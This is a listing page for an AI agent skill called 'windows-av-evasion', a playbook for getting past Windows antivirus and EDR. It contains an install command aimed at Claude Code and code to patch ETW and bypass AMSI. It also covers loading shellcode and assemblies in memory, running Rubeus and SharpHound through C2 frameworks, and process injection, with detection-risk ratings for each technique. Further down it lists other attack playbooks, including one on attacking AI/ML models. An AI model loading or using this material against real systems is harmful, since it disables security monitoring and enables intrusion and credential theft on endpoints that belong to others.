401-403-bypass-techniq…
401/403 bypass playbook. Use when encountering access-denied responses on admin panels, API endpoints, or restricted paths. Covers path manipulation, HTTP…
AV/EDR evasion playbook for Windows. Use when bypassing AMSI, ETW, .NET assembly detection, shellcode execution, process injection, API hooking, and signature-based detection on Windows endpoints.
$ npx -y skills add yaklang/hack-skills --skill windows-av-evasion --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/windows-av-evasionContext preview
The summary Claude sees to decide when to auto-load this skill.
AV/EDR evasion playbook for Windows. Use when bypassing AMSI, ETW, .NET assembly detection, shellcode execution, process injection, API hooking, and signature-based detection on Windows endpoints.
name: windows-av-evasion description: >- AV/EDR evasion playbook for Windows. Use when bypassing AMSI, ETW, .NET assembly detection, shellcode execution, process injection, API hooking, and signature-based detection on Windows endpoints.
> **AI LOAD INSTRUCTION**: Expert AV/EDR evasion techniques for Windows. Covers AMSI bypass, ETW bypass, .NET assembly loading, shellcode execution, process injection, unhooking, payload encryption, and signature evasion. Base models miss detection-specific bypass chains and syscall-level evasion nuances.
Before going deep, consider loading:
Also load [AMSI_BYPASS_TECHNIQUES.md](./AMSI_BYPASS_TECHNIQUES.md) when you need:
---
AMSI (Antimalware Scan Interface) inspects PowerShell, .NET, VBScript, JScript, and Office macros at runtime.
| Category | Method | Detection Risk | Persistence | |---|---|---|---| | Memory patching | Patch `AmsiScanBuffer` in `amsi.dll` | Medium | Per-process | | Reflection | Modify AMSI init flags via .NET reflection | Medium | Per-session | | String obfuscation | Encode/split AMSI trigger strings | Low | Per-payload | | PowerShell downgrade | Force PS v2 (no AMSI) | Low | Per-session | | CLM bypass | Escape Constrained Language Mode | Medium | Per-session | | COM hijack | Redirect AMSI COM server | Low | Per-user |
# PowerShell v2 downgrade (if .NET 2.0 available — no AMSI in v2) powershell -Version 2 # Reflection-based (set amsiInitFailed = true) # Obfuscated to avoid static detection — see AMSI_BYPASS_TECHNIQUES.md for full patterns
---
ETW (Event Tracing for Windows) feeds telemetry to EDR. Patching `EtwEventWrite` stops .NET assembly load events.
// C# — patch EtwEventWrite to return immediately
var ntdll = GetModuleHandle("ntdll.dll");
var etwAddr = GetProcAddress(ntdll, "EtwEventWrite");
// Write: ret (0xC3) to first byte
VirtualProtect(etwAddr, 1, 0x40, out uint oldProtect);
Marshal.WriteByte(etwAddr, 0xC3);
VirtualProtect(etwAddr, 1, oldProtect, out _);# Disable Script Block Logging (ETW provider)
[Reflection.Assembly]::LoadWithPartialName('System.Management.Automation')
# Set internal field to disable ETW tracing---
byte[] assemblyBytes = File.ReadAllBytes("tool.exe");
// Or download from URL, decrypt from resource
Assembly assembly = Assembly.Load(assemblyBytes);
assembly.EntryPoint.Invoke(null, new object[] { args });# Generate shellcode from .NET EXE donut -f tool.exe -o payload.bin -a 2 -c ToolNamespace.Program -m Main # With parameters donut -f Rubeus.exe -o rubeus.bin -a 2 -p "kerberoast /outfile:tgs.txt" # Then load shellcode via any injection technique (§5)
# Cobalt Strike execute-assembly /path/to/Rubeus.exe kerberoast # Sliver execute-assembly /path/to/SharpHound.exe -c all # Havoc dotnet inline-execute /path/to/tool.exe args
---
IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40); Marshal.Copy(sc, 0, addr, sc.Length); // Use callback API instead of CreateThread (less monitored) EnumWindows(addr, IntPtr.Zero);
**Callback APIs for shellcode execution**: `EnumWindows`, `EnumChildWindows`, `EnumFonts`, `EnumDesktops`, `CertEnumSystemStore`, `EnumDateFormats` — all accept function pointers that can point to shellcode.
---
| Technique | APIs Used | Detection Risk | Notes | |---|---|---|---| | **CreateRemoteThread** | OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread | High | Classic, heavily monitored | | **NtMapViewOfSection** | NtCreateSection, NtMapViewOfSection | Medium | Shared memory, less common | | **Process Hollowing** | CreateProcess (SUSPENDED), NtUnmapViewOfSection, WriteProcessMemory, ResumeThread | Medium | Replace process image | | **Thread Hijacking** | SuspendThread, SetThreadContext, ResumeThread | Medium | Modify existing thread | | **Early Bird** | CreateProcess (SUSPENDED), QueueUserAPC, ResumeThread | Low-Medium | APC before main thread | | **Phantom DLL Hollowing** | Map DLL section, overwrite with shellcode | Low | Uses legitimate DLL mapping | | **Module Stomping** | LoadLibrary, overwrite .text section | Low | Backed by legitimate DLL | | **Transacted Hollowing** | NtCreateTransaction, NtCreateSection | Low | No suspicious allocations |
IntPtr hProcess = OpenProcess(0x001F0FFF, false, targetPid); IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40); WriteProcessMemory(hProcess, addr, sc, (uint)sc.Length, out _); CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
// Create suspended process STARTUPINFO si = new STARTUPINFO(); PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); CreateProcess(null, "C:\\Windows\\System32\\svchost.exe", ..., CREATE_SUSPENDED, ..., ref si, r
Master Entry → Category Entries → Deep Topic Skills One master entry, six category entries, and 102 deep topic skills across 14 security domains.
Repo: yaklang/hack-skills
401/403 bypass playbook. Use when encountering access-denied responses on admin panels, API endpoints, or restricted paths. Covers path manipulation, HTTP…
Active Directory ACL abuse playbook. Use when exploiting misconfigured AD permissions including GenericAll, WriteDACL, DCSync rights, shadow credentials, LAPS…
AD Certificate Services attack playbook. Use when targeting misconfigured AD CS for privilege escalation via ESC1-ESC13 template abuse, NTLM relay to…
Kerberos attack playbook for Active Directory. Use when targeting AD authentication via AS-REP roasting, Kerberoasting, golden/silver/diamond tickets,…
AI/ML security playbook. Use when assessing model supply chain attacks (pickle RCE, poisoned weights), adversarial examples, model poisoning, model stealing,…
Android pentesting playbook. Use when testing Android applications for SSL pinning bypass, exported component abuse, WebView vulnerabilities, intent…